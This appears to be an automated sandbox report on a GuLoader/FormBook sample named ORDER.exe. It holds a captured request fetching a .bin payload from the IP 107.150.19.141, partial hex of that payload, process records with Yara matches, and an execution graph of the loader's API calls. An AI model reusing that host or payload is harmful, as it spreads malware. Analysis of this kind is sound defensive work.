                        Sep 12, 2024 10:16:32.374289989 CEST186OUTGET /ZngvhChQIdIscdxVPVXD182.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: 107.150.19.141
                        Cache-Control: no-cache
                        Sep 12, 2024 10:16:32.598370075 CEST1289INHTTP/1.1 200 OK
                        Content-Type: application/octet-stream
                        Last-Modified: Wed, 11 Sep 2024 22:20:56 GMT
                        Accept-Ranges: bytes
                        ETag: "4c2554df984db1:0"
                        Server: Microsoft-IIS/8.5
                        Date: Thu, 12 Sep 2024 11:21:24 GMT
                        Content-Length: 287296
                        Data Raw: 7e a5 93 ae 06 70 34 10 4c e9 69 e9 0d db 4d 6a 3b b4 8a 81 ba 3e 00 87 54 c3 b0 7b 95 bf 63 0a 90 fd 1a 34 1f c2 ac 48 77 2b ff 92 74 94 fb 04 89 97 65 15 ce db e0 91 52 04 45 8a 51 df c8 2e e9 df 15 2c 06 77 1b d7 d1 86 02 d2 0f d0 03 69 60 d3 6b 4d fb 15 56 69 3f 53 4a 8d 20 de 8b f0 46 1e 42 2b 9b b4 b2 d9 2b db 5f 57 b0 53 6f b5 2e 2b c0 4f bc fa 7d 6c 7b 80 70 69 b3 8e 29 5e 83 64 47 f7 e5 17 c2 8c 49 ed a1 ce a4 60 a4 71 ce af 76 3e e5 f9 29 bf 58 72 9f 79 ad 64 d6 44 00 a2 43 e5 21 90 bf 34 64 3d b6 45 cb 73 7d 0b 96 fe 9f de 6b 87 3d 56 64 71 40 74 4f f7 1e bd 46 8b 71 a8 b2 26 07 a1 d9 2f bb fe c9 80 38 80 f8 a9 dc cc a0 9f c9 75 7e a2 cb 20 9d 03 6d 7d f3 2a 60 1b 5b 5d 79 3a e4 21 a8 b9 1b 76 2e 60 2c d8 87 05 a2 29 4c ae 31 a2 b5 52 7f 89 35 f0 7d 00 10 ae 68 79 f1 0b 0c a0 84 b2 a9 ab fe 78 48 98 ca e9 57 17 e0 74 03 eb 0f ea 0e be 24 1a 23 78 92 20 5e bc 1d 78 c1 be ca 0f 52 d5 4e a8 37 6f d1 8f 90 8d e9 d8 77 17 8a ba 69 2e 9e aa 62 af 8d d5 9b 0c 0d ba 93 a0 6e 66 0d fe 1e 58 fc ff [TRUNCATED]
                        Data Ascii: ~p4LiMj;>T{c4Hw+teREQ.,wi`kMVi?SJ FB++_WSo.+O}l{pi)^dGI`qv>)XrydDC!4d=Es}k=Vdq@tOFq&/8u~ m}*`[]y:!v.`,)L1R5}hyxHWt$#x ^xRN7owi.bnfXu<_l5)oIg9(Nr&yB{6&K~JY2ZM/XwZl7W)wzuk2>#1KR82seb[-LQ[WXs49TZ}]xiK:`x|Gu7OV13`yvr.K eTt,i/R;2$&O})!Jc]r%@rRfcj^=PW%{S{WO2\OfdO';MR@=2K{#A!sjq)__@g) D}-`hc2caYaPbI2"~9gGpT}<kYE}8e-b[M2?aR\=PMFd%?}";\67]hpy%/tn,u9#<a9\p' "Zv'_EaZ`DcS#$,1I;Up~'L)X{!kFU7#\iq!?F [TRUNCATED]
                        Sep 12, 2024 10:16:32.598444939 CEST1289INData Raw: 69 fe 2f 61 5f d1 06 e8 d4 89 ae 7e 8c 6d 32 3e 92 bf be d5 0e a2 50 5a 3c 29 58 ea 65 f0 19 6a 12 29 9f 1a d0 41 84 ed dd 41 97 02 32 41 42 de 04 19 95 e0 e1 25 7e 2c 53 80 ef 50 de e1 30 ca d3 0f 5c 30 43 ed d9 46 e4 98 02 67 5e 74 6d df 80 ee
                        Data Ascii: i/a_~m2>PZ<)Xej)AA2AB%~,SP0\0CFg^tmX#gh_,P~w:[MPBrNFB++_WSo.+O}l{pi)^{AhUiAVNN9+t!ZDTe<.+E0\@q@tO?xF`RO_s
                        Sep 12, 2024 10:16:32.598507881 CEST1289INData Raw: 2b fb 91 fb bb 45 8a 30 5c 40 71 40 74 4f f7 1e bd 3f 8a 78 08 8f 46 60 52 e4 4f dc 0d f4 e0 5f 73 e2 0f 74 3f 9a ff ae 86 64 04 61 d3 a1 63 0a 8e e9 8c cb e8 67 3d 1e c9 b6 48 cb d1 26 16 49 93 2c d8 87 05 a2 29 4c ae 61 e7 b5 52 33 88 34 f0 9d
                        Data Ascii: +E0\@q@tO?xF`RO_st?dacg=H&I,)LaR34IhyIyCWGt$Sm ^xR7qi.djfXu<_ZZl59oIg9(Nr&yB{6&K~JY2ZM/X
                        Sep 12, 2024 10:16:32.598562956 CEST1289INData Raw: 26 cc c1 79 42 7b 36 26 c0 fa 4b 7e bd 4a c1 59 32 f8 e2 5a b8 93 a9 f2 e4 89 db b0 ea e1 10 de 4d 2f 58 ed 94 77 dc 03 be a8 93 a5 0d c7 06 5a 1c dc 6c 93 12 37 8e 57 10 9b f3 c3 b1 8d 0a 29 85 77 7a 8d e7 75 04 87 17 6b b7 f2 32 af 3e 23 31 18
                        Data Ascii: &yB{6&K~JY2ZM/XwZl7W)wzuk2>#1KR82seb[-LQ[WXsj9UTTZ}]xiK`x|Gu7OV13`yvr.K eTt,i/R;2$&O})!Jc]r%@rRfc
                        Sep 12, 2024 10:16:32.821602106 CEST1289INData Raw: 18 26 40 f2 c8 34 5c d4 9c 07 8e 90 ab 9e a1 8d 51 cb 11 14 8f 20 24 60 bc 72 05 aa 34 69 31 e4 6b 6b 87 14 8e be 90 9d 9b 7e 7c 40 89 ef 4f 4d 43 f2 0a 67 e9 dc aa fd de d1 aa b4 32 5c 9a ca 0f e1 66 b3 23 f7 3d 8a e7 34 73 38 cc f0 dd 37 39 5e
                        Data Ascii: &@4\Q $`r4i1kk~|@OMCg2\f#=4s879^& @=2{1wY^jrtX@vDx\5&box*k~:QE7Y`_#g;~3L#}-%t73$46;}
                        Sep 12, 2024 10:16:32.821683884 CEST1289INData Raw: b8 82 c7 e8 13 8d 9f 5e a4 1d 3a e7 03 32 da bc 04 88 26 24 f2 8e 07 15 e4 b4 5b 36 a5 ba a9 27 9e f6 4a 45 36 57 3a 01 1d 66 33 01 b2 06 27 c9 e7 57 eb 7c fa a3 72 ca 26 d8 d9 67 86 8f a4 4a c8 d6 1f 29 e5 af 1f ae 54 3f 67 73 a8 e4 54 28 ff 2c
                        Data Ascii: ^:2&$[6'JE6W:f3'W|r&gJ)T?gsT(,[3v?L\j|]1~Y?!(5&*(@Wb`U!bN7~Ya[|Hi*ED_A%JU>hq3`rCl9s0gW}9L8qy8 fWJA[.hz
                        Sep 12, 2024 10:16:32.821746111 CEST1289INData Raw: b1 3f 67 7d 06 8f 66 ba 9b cb 25 6b 59 e8 9c 82 85 f0 98 9b ff c3 f7 b0 31 71 1d f1 d1 d7 10 ab 83 3f 33 c2 30 10 0a 1c 7c 69 fe 14 b7 50 9d d0 a0 a1 71 17 32 e6 6d 32 b3 db bf 06 ec 80 41 68 ad d5 e8 a2 e9 ee 3a d8 83 0d 2a 55 6f 3d ca 4f ac 56
                        Data Ascii: ?g}f%kY1q?30|iPq2m2Ah:*Uo=OV2AQ(e-05$ s\h/PL\-wa)lky8%P$Ff_Wo.|}l)iVNP$9vFtZD
                        Sep 12, 2024 10:16:32.821805000 CEST1289INData Raw: 4b 38 6d 1d 23 4a 91 01 85 18 e6 5d af 3d 8b 96 4e b1 df 94 ca 0a ff c3 31 66 8c bb af 48 00 e2 ca 55 c2 bb d9 65 8f 87 fc 2b fb 91 70 45 c8 ee 14 5c cb 24 84 cc 3d 94 1e bd d4 8c f5 93 8f 46 60 52 65 b5 0e 0d f4 e0 50 3f 31 47 01 cb 95 49 32 bf
                        Data Ascii: K8m#J]=N1fHUe+pE\$=F`ReP?1GI2aUbs:5r>S$TpTgl7:;ty gWGDESY[SASOy{4:Ipr`c1HxNGVXhZZG4@d]@)clx$156
                        Sep 12, 2024 10:16:32.821860075 CEST1289INData Raw: 59 8b ad cf 3e 72 a5 4d 41 e0 4a 56 7a 5a 95 f1 79 46 c2 c0 21 ed e6 ec f1 1d 07 c4 c4 fe 23 93 fe a6 48 89 03 19 9f aa 86 af 89 31 c7 bc 7a 36 26 2b fc c6 e5 bd 4a c1 59 8a 75 22 52 34 64 47 f1 32 48 21 b6 61 13 d1 30 52 2c aa 98 7f fc 89 13 35
                        Data Ascii: Y>rMAJVzZyF!#H1z6&+JYu"R4dG2H!a0R,5jRMB.CW)o+G!:W)syTX2,+>9v)B&#exN~LQQsg!BV@P*ikUY{x]| .u#6DBBrp13kRrDo-xq]]}tR
                        Sep 12, 2024 10:16:32.821913958 CEST1289INData Raw: 6c ff 01 cc 3e ba c9 b7 07 2d 74 88 22 55 54 20 0f 54 f3 b4 af 24 3f eb d6 a4 04 98 69 2f 52 d8 47 0d 9b 92 43 f0 0c 27 43 d9 dc 4a 36 c0 bc c0 3e 14 80 f7 88 2f ad 14 d6 9b 96 7c b2 8f 72 44 6c 4c f3 7b b5 26 4c 62 53 17 80 63 69 46 17 cf 43 bd
                        Data Ascii: l>-t"UT T$?i/RGC'CJ6>/|rDlL{&LbSciFC%@#\HLRhqZWQQVOBqAep_X"He<ZUh?#PA"4MB1g!m)&G+$%MnkC7*{"<8Gw
                        Sep 12, 2024 10:16:32.821981907 CEST1289INData Raw: 9e d2 93 38 e8 4f d1 90 d9 3d 4b f2 0c 81 d6 d9 de af 3b 7e 39 99 bc df bf 99 e3 77 a3 16 58 87 0e b7 a1 98 3f e7 d1 50 ee a8 c5 07 63 71 4e 95 4a 9a b7 d4 99 d4 f3 31 20 c3 7a da 8c 23 e0 e8 24 79 58 40 5c 48 b2 49 50 60 cf 91 78 82 b7 cd b1 21
                        Data Ascii: 8O=K;~9wX?PcqNJ1 z#$yX@\HIP`x! PjKl\r!8p2Of&TZ^sAI;R}b-RMj'P;^['!THs,wS4#-tC_&8i`G`kW7n/F@$C


                        Click to jump to process

                        Click to jump to process

                        Click to jump to process

                        Target ID:0
                        Start time:04:16:03
                        Start date:12/09/2024
                        Path:C:\Users\user\Desktop\ORDER.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\ORDER.exe"
                        Imagebase:0x400000
                        File size:493'216 bytes
                        MD5 hash:08D42759644A2B6C75D6E1CDF188BF40
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.32236386433.00000000050E4000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        Target ID:3
                        Start time:04:16:26
                        Start date:12/09/2024
                        Path:C:\Users\user\Desktop\ORDER.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\ORDER.exe"
                        Imagebase:0x400000
                        File size:493'216 bytes
                        MD5 hash:08D42759644A2B6C75D6E1CDF188BF40
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.32881458791.0000000032090000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.32881458791.0000000032090000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                        Reputation:low
                        Has exited:true

                        Target ID:4
                        Start time:04:16:36
                        Start date:12/09/2024
                        Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                        Imagebase:0x140000000
                        File size:16'696'840 bytes
                        MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:false

                        Reset < >

                          Execution Graph

                          Execution Coverage:21.7%
                          Dynamic/Decrypted Code Coverage:14.4%
                          Signature Coverage:19.6%
                          Total number of Nodes:1463
                          Total number of Limit Nodes:41
                          execution_graph 4899 10001000 4902 1000101b 4899->4902 4909 100014bb 4902->4909 4904 10001020 4905 10001024 4904->4905 4906 10001027 GlobalAlloc 4904->4906 4907 100014e2 3 API calls 4905->4907 4906->4905 4908 10001019 4907->4908 4911 100014c1 4909->4911 4910 100014c7 4910->4904 4911->4910 4912 100014d3 GlobalFree 4911->4912 4912->4904 4913 4022c0 4914 4022f0 4913->4914 4915 4022c5 4913->4915 4917 4029fd 18 API calls 4914->4917 4916 402b07 19 API calls 4915->4916 4918 4022cc 4916->4918 4919 4022f7 4917->4919 4920 4029fd 18 API calls 4918->4920 4923 40230d 4918->4923 4924 402a3d RegOpenKeyExA 4919->4924 4922 4022dd RegDeleteValueA RegCloseKey 4920->4922 4922->4923 4931 402a68 4924->4931 4933 402ab4 4924->4933 4925 402a8e RegEnumKeyA 4926 402aa0 RegCloseKey 4925->4926 4925->4931 4928 406061 3 API calls 4926->4928 4927 402ac5 RegCloseKey 4927->4933 4930 402ab0 4928->4930 4929 402a3d 3 API calls 4929->4931 4932 402ae0 RegDeleteKeyA 4930->4932 4930->4933 4931->4925 4931->4926 4931->4927 4931->4929 4932->4933 4933->4923 4934 4019c0 4935 4029fd 18 API calls 4934->4935 4936 4019c7 4935->4936 4937 4029fd 18 API calls 4936->4937 4938 4019d0 4937->4938 4939 4019d7 lstrcmpiA 4938->4939 4940 4019e9 lstrcmpA 4938->4940 4941 4019dd 4939->4941 4940->4941 4942 402b42 4943 402b51 SetTimer 4942->4943 4944 402b6a 4942->4944 4943->4944 4945 402bb8 4944->4945 4946 402bbe MulDiv 4944->4946 4947 402b78 wsprintfA SetWindowTextA SetDlgItemTextA 4946->4947 4947->4945 4949 402645 4950 4029fd 18 API calls 4949->4950 4951 40264c FindFirstFileA 4950->4951 4952 40266f 4951->4952 4953 40265f 4951->4953 4957 405c94 wsprintfA 4952->4957 4955 402676 4958 405d36 lstrcpynA 4955->4958 4957->4955 4958->4953 4959 403745 4960 403750 4959->4960 4961 403757 GlobalAlloc 4960->4961 4962 403754 4960->4962 4961->4962 4977 4023c8 4978 402b07 19 API calls 4977->4978 4979 4023d2 4978->4979 4980 4029fd 18 API calls 4979->4980 4981 4023db 4980->4981 4982 4023e5 RegQueryValueExA 4981->4982 4985 402663 4981->4985 4983 40240b RegCloseKey 4982->4983 4984 402405 4982->4984 4983->4985 4984->4983 4988 405c94 wsprintfA 4984->4988 4988->4983 4095 4014ca 4096 40501f 25 API calls 4095->4096 4097 4014d1 4096->4097 4989 401ccc GetDlgItem GetClientRect 4990 4029fd 18 API calls 4989->4990 4991 401cfc LoadImageA SendMessageA 4990->4991 4992 402892 4991->4992 4993 401d1a DeleteObject 4991->4993 4993->4992 4994 1000180d 4995 10001830 4994->4995 4996 10001860 GlobalFree 4995->4996 4997 10001872 4995->4997 4996->4997 4998 10001266 2 API calls 4997->4998 4999 100019e3 GlobalFree GlobalFree 4998->4999 4119 1000270f 4120 1000275f 4119->4120 4121 1000271f VirtualProtect 4119->4121 4121->4120 4122 4024d1 4123 4024d6 4122->4123 4124 4024e7 4122->4124 4125 4029e0 18 API calls 4123->4125 4126 4029fd 18 API calls 4124->4126 4128 4024dd 4125->4128 4127 4024ee lstrlenA 4126->4127 4127->4128 4129 40250d WriteFile 4128->4129 4130 402663 4128->4130 4129->4130 4181 4025d3 4182 40283f 4181->4182 4183 4025da 4181->4183 4184 4029e0 18 API calls 4183->4184 4185 4025e5 4184->4185 4186 4025ec SetFilePointer 4185->4186 4186->4182 4187 4025fc 4186->4187 4189 405c94 wsprintfA 4187->4189 4189->4182 4219 4014d6 4220 4029e0 18 API calls 4219->4220 4221 4014dc Sleep 4220->4221 4223 402892 4221->4223 4638 401dd8 4639 4029fd 18 API calls 4638->4639 4640 401dde 4639->4640 4641 4029fd 18 API calls 4640->4641 4642 401de7 4641->4642 4643 4029fd 18 API calls 4642->4643 4644 401df0 4643->4644 4645 4029fd 18 API calls 4644->4645 4646 401df9 4645->4646 4647 401423 25 API calls 4646->4647 4648 401e00 ShellExecuteA 4647->4648 4649 401e2d 4648->4649 5007 1000161a 5008 10001649 5007->5008 5009 10001a5d 18 API calls 5008->5009 5010 10001650 5009->5010 5011 10001663 5010->5011 5012 10001657 5010->5012 5014 1000168a 5011->5014 5015 1000166d 5011->5015 5013 10001266 2 API calls 5012->5013 5016 10001661 5013->5016 5018 10001690 5014->5018 5019 100016b4 5014->5019 5017 100014e2 3 API calls 5015->5017 5021 10001672 5017->5021 5022 10001559 3 API calls 5018->5022 5020 100014e2 3 API calls 5019->5020 5020->5016 5023 10001559 3 API calls 5021->5023 5024 10001695 5022->5024 5026 10001678 5023->5026 5025 10001266 2 API calls 5024->5025 5027 1000169b GlobalFree 5025->5027 5028 10001266 2 API calls 5026->5028 5027->5016 5029 100016af GlobalFree 5027->5029 5030 1000167e GlobalFree 5028->5030 5029->5016 5030->5016 5031 40155b 5032 401577 ShowWindow 5031->5032 5033 40157e 5031->5033 5032->5033 5034 40158c ShowWindow 5033->5034 5035 402892 5033->5035 5034->5035 5043 401edc 5044 4029fd 18 API calls 5043->5044 5045 401ee3 GetFileVersionInfoSizeA 5044->5045 5046 401f06 GlobalAlloc 5045->5046 5048 401f5c 5045->5048 5047 401f1a GetFileVersionInfoA 5046->5047 5046->5048 5047->5048 5049 401f2b VerQueryValueA 5047->5049 5049->5048 5050 401f44 5049->5050 5054 405c94 wsprintfA 5050->5054 5052 401f50 5055 405c94 wsprintfA 5052->5055 5054->5052 5055->5048 4801 40515d 4802 405308 4801->4802 4803 40517f GetDlgItem GetDlgItem GetDlgItem 4801->4803 4804 405310 GetDlgItem CreateThread CloseHandle 4802->4804 4805 405338 4802->4805 4847 404021 SendMessageA 4803->4847 4804->4805 4850 4050f1 5 API calls 4804->4850 4808 405366 4805->4808 4809 405387 4805->4809 4810 40534e ShowWindow ShowWindow 4805->4810 4807 4051ef 4813 4051f6 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4807->4813 4811 4053c1 4808->4811 4812 40536e 4808->4812 4817 404053 8 API calls 4809->4817 4849 404021 SendMessageA 4810->4849 4811->4809 4820 4053ce SendMessageA 4811->4820 4815 405376 4812->4815 4816 40539a ShowWindow 4812->4816 4818 405264 4813->4818 4819 405248 SendMessageA SendMessageA 4813->4819 4821 403fc5 SendMessageA 4815->4821 4822 4053ba 4816->4822 4823 4053ac 4816->4823 4828 405393 4817->4828 4825 405277 4818->4825 4826 405269 SendMessageA 4818->4826 4819->4818 4827 4053e7 CreatePopupMenu 4820->4827 4820->4828 4821->4809 4824 403fc5 SendMessageA 4822->4824 4829 40501f 25 API calls 4823->4829 4824->4811 4831 403fec 19 API calls 4825->4831 4826->4825 4830 405d58 18 API calls 4827->4830 4829->4822 4832 4053f7 AppendMenuA 4830->4832 4833 405287 4831->4833 4834 405415 GetWindowRect 4832->4834 4835 405428 TrackPopupMenu 4832->4835 4836 405290 ShowWindow 4833->4836 4837 4052c4 GetDlgItem SendMessageA 4833->4837 4834->4835 4835->4828 4838 405444 4835->4838 4839 4052b3 4836->4839 4840 4052a6 ShowWindow 4836->4840 4837->4828 4841 4052eb SendMessageA SendMessageA 4837->4841 4842 405463 SendMessageA 4838->4842 4848 404021 SendMessageA 4839->4848 4840->4839 4841->4828 4842->4842 4843 405480 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4842->4843 4845 4054a2 SendMessageA 4843->4845 4845->4845 4846 4054c4 GlobalUnlock SetClipboardData CloseClipboard 4845->4846 4846->4828 4847->4807 4848->4837 4849->4808 5061 4018e3 5062 40191a 5061->5062 5063 4029fd 18 API calls 5062->5063 5064 40191f 5063->5064 5065 4055f6 71 API calls 5064->5065 5066 401928 5065->5066 5067 4043e3 5068 4043f3 5067->5068 5069 404419 5067->5069 5070 403fec 19 API calls 5068->5070 5071 404053 8 API calls 5069->5071 5073 404400 SetDlgItemTextA 5070->5073 5072 404425 5071->5072 5073->5069 5074 4018e6 5075 4029fd 18 API calls 5074->5075 5076 4018ed 5075->5076 5077 40554a MessageBoxIndirectA 5076->5077 5078 4018f6 5077->5078 3858 401f68 3859 401f7a 3858->3859 3860 402028 3858->3860 3879 4029fd 3859->3879 3863 401423 25 API calls 3860->3863 3868 402181 3863->3868 3864 4029fd 18 API calls 3865 401f8a 3864->3865 3866 401f92 GetModuleHandleA 3865->3866 3867 401f9f LoadLibraryExA 3865->3867 3866->3867 3869 401faf GetProcAddress 3866->3869 3867->3860 3867->3869 3870 401ffb 3869->3870 3871 401fbe 3869->3871 3930 40501f 3870->3930 3872 401fc6 3871->3872 3873 401fdd 3871->3873 3927 401423 3872->3927 3885 100016bd 3873->3885 3876 401fce 3876->3868 3877 40201c FreeLibrary 3876->3877 3877->3868 3880 402a09 3879->3880 3941 405d58 3880->3941 3883 401f81 3883->3864 3886 100016ed 3885->3886 3980 10001a5d 3886->3980 3888 100016f4 3889 1000180a 3888->3889 3890 10001705 3888->3890 3891 1000170c 3888->3891 3889->3876 4029 100021b0 3890->4029 4012 100021fa 3891->4012 3896 10001770 3902 100017b2 3896->3902 3903 10001776 3896->3903 3897 10001752 4042 100023da 3897->4042 3898 10001722 3901 10001728 3898->3901 3907 10001733 3898->3907 3899 1000173b 3914 10001731 3899->3914 4039 10002aa7 3899->4039 3901->3914 4023 100027ec 3901->4023 3905 100023da 11 API calls 3902->3905 3909 10001559 3 API calls 3903->3909 3915 100017a4 3905->3915 3906 10001758 4053 10001559 3906->4053 4033 1000258d 3907->4033 3912 1000178c 3909->3912 3913 100023da 11 API calls 3912->3913 3913->3915 3914->3896 3914->3897 3918 100017f9 3915->3918 4064 100023a0 3915->4064 3917 10001739 3917->3914 3918->3889 3920 10001803 GlobalFree 3918->3920 3920->3889 3924 100017e5 3924->3918 4068 100014e2 wsprintfA 3924->4068 3925 100017de FreeLibrary 3925->3924 3928 40501f 25 API calls 3927->3928 3929 401431 3928->3929 3929->3876 3931 4050dd 3930->3931 3932 40503a 3930->3932 3931->3876 3933 405057 lstrlenA 3932->3933 3934 405d58 18 API calls 3932->3934 3935 405080 3933->3935 3936 405065 lstrlenA 3933->3936 3934->3933 3938 405093 3935->3938 3939 405086 SetWindowTextA 3935->3939 3936->3931 3937 405077 lstrcatA 3936->3937 3937->3935 3938->3931 3940 405099 SendMessageA SendMessageA SendMessageA 3938->3940 3939->3938 3940->3931 3954 405d65 3941->3954 3942 405f88 3943 402a2a 3942->3943 3975 405d36 lstrcpynA 3942->3975 3943->3883 3959 405fa1 3943->3959 3945 405e06 GetVersion 3945->3954 3946 405f5f lstrlenA 3946->3954 3949 405d58 10 API calls 3949->3946 3950 405e7e GetSystemDirectoryA 3950->3954 3952 405e91 GetWindowsDirectoryA 3952->3954 3953 405fa1 5 API calls 3953->3954 3954->3942 3954->3945 3954->3946 3954->3949 3954->3950 3954->3952 3954->3953 3955 405f08 lstrcatA 3954->3955 3956 405ec5 SHGetSpecialFolderLocation 3954->3956 3957 405d58 10 API calls 3954->3957 3968 405c1d RegOpenKeyExA 3954->3968 3973 405c94 wsprintfA 3954->3973 3974 405d36 lstrcpynA 3954->3974 3955->3954 3956->3954 3958 405edd SHGetPathFromIDListA CoTaskMemFree 3956->3958 3957->3954 3958->3954 3962 405fad 3959->3962 3960 406015 3961 406019 CharPrevA 3960->3961 3964 406034 3960->3964 3961->3960 3962->3960 3963 40600a CharNextA 3962->3963 3966 405ff8 CharNextA 3962->3966 3967 406005 CharNextA 3962->3967 3976 4057f1 3962->3976 3963->3960 3963->3962 3964->3883 3966->3962 3967->3963 3969 405c50 RegQueryValueExA 3968->3969 3970 405c8e 3968->3970 3971 405c71 RegCloseKey 3969->3971 3970->3954 3971->3970 3973->3954 3974->3954 3975->3943 3977 4057f7 3976->3977 3978 40580a 3977->3978 3979 4057fd CharNextA 3977->3979 3978->3962 3979->3977 4071 10001215 GlobalAlloc 3980->4071 3982 10001a81 4072 10001215 GlobalAlloc 3982->4072 3984 10001cbb GlobalFree GlobalFree GlobalFree 3985 10001cd8 3984->3985 4000 10001d22 3984->4000 3986 1000201a 3985->3986 3994 10001ced 3985->3994 3985->4000 3988 1000203c GetModuleHandleA 3986->3988 3986->4000 3987 10001b60 GlobalAlloc 4007 10001a8c 3987->4007 3989 10002062 3988->3989 3990 1000204d LoadLibraryA 3988->3990 4079 100015a4 GetProcAddress 3989->4079 3990->3989 3990->4000 3991 10001bab lstrcpyA 3995 10001bb5 lstrcpyA 3991->3995 3992 10001bc9 GlobalFree 3992->4007 3994->4000 4075 10001224 3994->4075 3995->4007 3996 100020b3 3999 100020c0 lstrlenA 3996->3999 3996->4000 3998 10001f7a 3998->4000 4004 10001fbe lstrcpyA 3998->4004 4080 100015a4 GetProcAddress 3999->4080 4000->3888 4001 10002074 4001->3996 4011 1000209d GetProcAddress 4001->4011 4004->4000 4005 10001c07 4005->4007 4073 10001534 GlobalSize GlobalAlloc 4005->4073 4006 10001e75 GlobalFree 4006->4007 4007->3984 4007->3987 4007->3991 4007->3992 4007->3995 4007->3998 4007->4000 4007->4005 4007->4006 4010 10001224 2 API calls 4007->4010 4078 10001215 GlobalAlloc 4007->4078 4008 100020d9 4008->4000 4010->4007 4011->3996 4021 10002212 4012->4021 4014 10002349 GlobalFree 4017 10001712 4014->4017 4014->4021 4015 100022b9 GlobalAlloc MultiByteToWideChar 4018 10002303 4015->4018 4019 100022e3 GlobalAlloc CLSIDFromString GlobalFree 4015->4019 4016 1000230a lstrlenA 4016->4014 4016->4018 4017->3898 4017->3899 4017->3914 4018->4014 4086 10002521 4018->4086 4019->4014 4020 10001224 GlobalAlloc lstrcpynA 4020->4021 4021->4014 4021->4015 4021->4016 4021->4020 4082 100012ad 4021->4082 4025 100027fe 4023->4025 4024 100028a3 SetFilePointer 4026 100028c1 4024->4026 4025->4024 4027 100029b2 GetLastError 4026->4027 4028 100029bd 4026->4028 4027->4028 4028->3914 4030 100021c0 4029->4030 4031 1000170b 4029->4031 4030->4031 4032 100021d2 GlobalAlloc 4030->4032 4031->3891 4032->4030 4037 100025a9 4033->4037 4034 100025fa GlobalAlloc 4038 1000261c 4034->4038 4035 1000260d 4036 10002612 GlobalSize 4035->4036 4035->4038 4036->4038 4037->4034 4037->4035 4038->3917 4040 10002ab2 4039->4040 4041 10002af2 GlobalFree 4040->4041 4089 10001215 GlobalAlloc 4042->4089 4044 10002473 WideCharToMultiByte 4050 100023e6 4044->4050 4045 1000243a lstrcpynA 4045->4050 4046 1000244b StringFromGUID2 WideCharToMultiByte 4046->4050 4047 10002494 wsprintfA 4047->4050 4048 100024b8 GlobalFree 4048->4050 4049 100024f2 GlobalFree 4049->3906 4050->4044 4050->4045 4050->4046 4050->4047 4050->4048 4050->4049 4051 10001266 2 API calls 4050->4051 4090 100012d1 4050->4090 4051->4050 4094 10001215 GlobalAlloc 4053->4094 4055 1000155f 4056 1000156c lstrcpyA 4055->4056 4058 10001586 4055->4058 4059 100015a0 4056->4059 4058->4059 4060 1000158b wsprintfA 4058->4060 4061 10001266 4059->4061 4060->4059 4062 100012a8 GlobalFree 4061->4062 4063 1000126f GlobalAlloc lstrcpynA 4061->4063 4062->3915 4063->4062 4065 100017c5 4064->4065 4066 100023ae 4064->4066 4065->3924 4065->3925 4066->4065 4067 100023c7 GlobalFree 4066->4067 4067->4066 4069 10001266 2 API calls 4068->4069 4070 10001503 4069->4070 4070->3918 4071->3982 4072->4007 4074 10001552 4073->4074 4074->4005 4081 10001215 GlobalAlloc 4075->4081 4077 10001233 lstrcpynA 4077->4000 4078->4007 4079->4001 4080->4008 4081->4077 4083 100012b4 4082->4083 4084 10001224 2 API calls 4083->4084 4085 100012cf 4084->4085 4085->4021 4087 10002585 4086->4087 4088 1000252f VirtualAlloc 4086->4088 4087->4018 4088->4087 4089->4050 4091 100012f9 4090->4091 4092 100012da 4090->4092 4091->4050 4092->4091 4093 100012e0 lstrcpyA 4092->4093 4093->4091 4094->4055 5079 40286d SendMessageA 5080 402892 5079->5080 5081 402887 InvalidateRect 5079->5081 5081->5080 5082 4014f0 SetForegroundWindow 5083 402892 5082->5083 5084 401af0 5085 4029fd 18 API calls 5084->5085 5086 401af7 5085->5086 5087 4029e0 18 API calls 5086->5087 5088 401b00 wsprintfA 5087->5088 5089 402892 5088->5089 5090 4019f1 5091 4029fd 18 API calls 5090->5091 5092 4019fa ExpandEnvironmentStringsA 5091->5092 5093 401a0e 5092->5093 5095 401a21 5092->5095 5094 401a13 lstrcmpA 5093->5094 5093->5095 5094->5095 5096 100015b3 5097 100014bb GlobalFree 5096->5097 5099 100015cb 5097->5099 5098 10001611 GlobalFree 5099->5098 5100 100015e6 5099->5100 5101 100015fd VirtualFree 5099->5101 5100->5098 5101->5098 5109 401c78 5110 4029e0 18 API calls 5109->5110 5111 401c7e IsWindow 5110->5111 5112 4019e1 5111->5112 5113 40477a 5114 4047a6 5113->5114 5115 40478a 5113->5115 5117 4047d9 5114->5117 5118 4047ac SHGetPathFromIDListA 5114->5118 5124 40552e GetDlgItemTextA 5115->5124 5120 4047c3 SendMessageA 5118->5120 5121 4047bc 5118->5121 5119 404797 SendMessageA 5119->5114 5120->5117 5122 40140b 2 API calls 5121->5122 5122->5120 5124->5119 5125 1000103d 5126 1000101b 5 API calls 5125->5126 5127 10001056 5126->5127 5128 4014fe 5129 401506 5128->5129 5131 401519 5128->5131 5130 4029e0 18 API calls 5129->5130 5130->5131 4851 40227f 4852 4029fd 18 API calls 4851->4852 4853 402290 4852->4853 4854 4029fd 18 API calls 4853->4854 4855 402299 4854->4855 4856 4029fd 18 API calls 4855->4856 4857 4022a3 GetPrivateProfileStringA 4856->4857 5132 401000 5133 401037 BeginPaint GetClientRect 5132->5133 5134 40100c 